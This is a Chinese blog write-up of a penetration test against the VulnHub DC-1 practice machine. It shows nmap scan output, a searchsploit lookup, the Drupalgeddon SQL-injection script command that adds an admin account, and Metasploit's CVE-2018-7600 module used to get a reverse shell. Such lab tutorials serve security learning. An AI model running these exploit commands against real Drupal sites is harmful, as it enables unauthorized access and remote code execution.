【渗透测试】DC-1靶机实战(上)漏洞扫描获取反弹shell

本文最后更新于 2024年8月2日 下午

靶机下载地址Vulnerable By Design ~ VulnHub

靶机界面

渗透测试流程:

1.范围界定
2.信息搜集
3.目标识别
4.服务枚举
5.漏洞映射
6.社会工程学
7.漏洞利用
8.权限提升
9.访问维护
10.文档报告

一、范围界定

这个范围实验

二、信息收集

三、目标识别

1)主机发现

这里因为DC-1并不知道密码且无法登录,所以无法设置并知道DC-1主机的ip地址

这里使用nmap对10.14.0.0网段进行扫描

也可以使用arp进行二层主机扫描(arp请求嗅探)

值得注意的是arp-scan与nmap发出的是arp请求嗅探

2)端口扫描

1
sudo nmap -Pn -A -p- -sS -sC -T4 172.20.10.4 -oN DC-1.nmap.A
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
Starting Nmap 7.93 ( https://nmap.org ) at 2024-06-02 17:04 CST
    Nmap scan report for 172.20.10.4
    Host is up (0.0012s latency).
    Not shown: 65531 closed tcp ports (reset)
    PORT      STATE SERVICE VERSION
    22/tcp    open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
    | ssh-hostkey: 
    |   1024 c4d659e6774c227a961660678b42488f (DSA)
    |   2048 1182fe534edc5b327f446482757dd0a0 (RSA)
    |_  256 3daa985c87afea84b823688db9055fd8 (ECDSA)
    80/tcp    open  http    Apache httpd 2.2.22 ((Debian))
    |_http-server-header: Apache/2.2.22 (Debian)
    | http-robots.txt: 36 disallowed entries (15 shown)
    | /includes/ /misc/ /modules/ /profiles/ /scripts/ 
    | /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
    | /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
    |_/LICENSE.txt /MAINTAINERS.txt
    |_http-title: Welcome to Drupal Site | Drupal Site
    |_http-generator: Drupal 7 (http://drupal.org)
    111/tcp   open  rpcbind 2-4 (RPC #100000)
    | rpcinfo: 
    |   program version    port/proto  service
    |   100000  2,3,4        111/tcp   rpcbind
    |   100000  2,3,4        111/udp   rpcbind
    |   100000  3,4          111/tcp6  rpcbind
    |   100000  3,4          111/udp6  rpcbind
    |   100024  1          38976/tcp   status
    |   100024  1          46754/udp   status
    |   100024  1          46862/udp6  status
    |_  100024  1          48400/tcp6  status
    38976/tcp open  status  1 (RPC #100024)
    MAC Address: 00:0C:29:66:20:C9 (VMware)
    Device type: general purpose
    Running: Linux 3.X
    OS CPE: cpe:/o:linux:linux_kernel:3
    OS details: Linux 3.2 - 3.16
    Network Distance: 1 hop
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
     
    TRACEROUTE
    HOP RTT     ADDRESS
    1   1.22 ms 172.20.10.4
     
    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 22.56 seconds

可以看到目标开放了

22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)

80/tcp open http Apache httpd 2.2.22 ((Debian))

111/tcp open rpcbind 2-4 (RPC #100000)

38976/tcp open status 1 (RPC #100024)

四. 服务枚举

1)网站首页

根据上面的端口扫描可以知道服务器系统

​ Running: Linux 3.X
​ OS CPE: cpe:/o:linux:linux_kernel:3
​ OS details: Linux 3.2 - 3.16

2)Web指纹识别

3)nikto报告

nikto -h http://10.10.10.31

4)robots.txt

robots.txt是网站的一种协议文件。它主要有以下作用:

​ 指引搜索引擎爬虫:告诉搜索引擎哪些页面可以抓取,哪些不可以抓取。例如,可以禁止搜索引擎访问网站后台管理页面等敏感区域。
​ 控制抓取频率:可以对搜索引擎抓取网站内容的频率进行一定程度的限制

https://172.20.10.4/robots.txt

5)UPGRADE.txt

UPGRADE.txt 也可能用于记录软件或系统的升级说明、版本信息、更新内容等。具体用途取决于生成该文件的程序或系统的设计。

五. 漏洞映射

1)OpenAVS扫描

2)AWVS扫描

六. 漏洞利用

可以使用扫描器看到

Drupal Core Critical Remote Code Execution Vulnerability(SA-CORE-2018-002) (Active Check)CVE-2018-7600

Drupal Core SQLi Vulnerability (SA-CORE-2014-005) - Active Check

两个可以利用的高危漏洞
1)Drupal Core SQLi Vulnerability (SA-CORE-2014-005) - Active Check

查找漏洞信息

1
grep -rwn /usr/share/exploitdb/ -e "CVE-2014-3704"
1
2
3
4
5
6
7
/usr/share/exploitdb/exploits/php/webapps/34992.py:175:                         (CVE-2014-3704)
 /usr/share/exploitdb/exploits/php/webapps/34993.php:8:# CVE: CVE-2014-3704                                                          #
 /usr/share/exploitdb/files_exploits.csv:17127:34992,exploits/php/webapps/34992.py,"Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User)",2014-10-17,"Claudio Viviani",webapps,php,,2014-10-17,2018-03-29,1,CVE-2014-3704;OSVDB-113371;SA-CORE-2014-005,,,,,
 /usr/share/exploitdb/files_exploits.csv:17128:44355,exploits/php/webapps/44355.php,"Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Admin Session)",2014-11-03,"Stefan Horst",webapps,php,443,2018-03-29,2018-03-29,0,CVE-2014-3704;OSVDB-113371,,,,,https://www.sektioaneins.de/en/blog/14-11-03-drupal-sql-injection-vulnerability-PoC.html
 /usr/share/exploitdb/files_exploits.csv:17129:34984,exploits/php/webapps/34984.py,"Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (1)",2014-10-16,stopstene,webapps,php,,2014-10-17,2018-03-29,1,CVE-2014-3704;SA-CORE-2014-005,,,http://www.exploit-db.com/screenshots/idlt35000/drupal.png,,https://pastebin.com/nDwLFV3v
 /usr/share/exploitdb/files_exploits.csv:17130:34993,exploits/php/webapps/34993.php,"Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (2)",2014-10-17,"Dustin Dörr",webapps,php,,2014-10-17,2018-03-29,1,CVE-2014-3704;OSVDB-113371,,,,,
 /usr/share/exploitdb/files_exploits.csv:17131:35150,exploits/php/webapps/35150.php,"Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Remote Code Execution)",2014-11-03,"Stefan Horst",webapps,php,443,2014-11-03,2018-03-29,1,CVE-2014-3704;OSVDB-113371,,,,,https://www.sektioneins.de/en/blog/14-11-03-drupal-sql-injection-vulnerability-PoC.html

查找漏洞详细信息

1
searchsploit -m 34992

可以看到脚本路径:

1
Path: /usr/share/exploitdb/exploits/php/webapps/34992.py

对应POC代码:

根据这条代码可以知道POC的使用方法,运行脚本,可以向服务器注入一条用户

1
python 34992.py -t http://172.20.10.4 -u xiaolu -p 123456

用户添加成功

登录成功

找到flag3

2)Drupal Core Critical Remote Code Execution Vulnerability(SA-CORE-2018-002) (Active Check)CVE-2018-7600

这里使用metaploits工具

启动metaploits

1
msf6 > use CVE-2018-7600

使用CVE-2018-7600攻击载荷

设置目标主机与目标端口

设置反弹shell接收端口,exploit开炮

拿到目标主机shell

#网络安全
【渗透测试】DC-1靶机实战(上)漏洞扫描获取反弹shell
http://www.ybyb.org.cn/2024/07/14/【渗透测试】DC-1靶机实战(上)漏洞扫描获取反弹shell/
作者
LHN
发布于
2024年7月14日
许可协议